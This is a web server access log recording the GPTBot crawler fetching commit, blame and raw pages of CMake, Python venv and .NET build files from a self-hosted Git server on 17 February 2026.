[Length 11403] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" -[17/Feb/2026:14:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10699] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" -[17/Feb/2026:14:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:14:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10271] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10271] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/.vscode" -[17/Feb/2026:14:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/.vscode" -[17/Feb/2026:14:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11355] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" -[17/Feb/2026:14:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" -[17/Feb/2026:14:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:42:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject" -[17/Feb/2026:14:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:42:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10468] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10407] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm" -[17/Feb/2026:14:42:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10872] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" -[17/Feb/2026:14:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10696] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:14:42:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" -[17/Feb/2026:14:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10421] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10192] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" -[17/Feb/2026:14:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11110] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" -[17/Feb/2026:14:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject" -[17/Feb/2026:14:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject" -[17/Feb/2026:14:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11147] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14158] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:14:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11306] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21337] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11875] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:42:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14725] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:14:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:14:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build" -[17/Feb/2026:14:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" -[17/Feb/2026:14:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:14:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:14:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10242] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10661] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31148] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13476] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 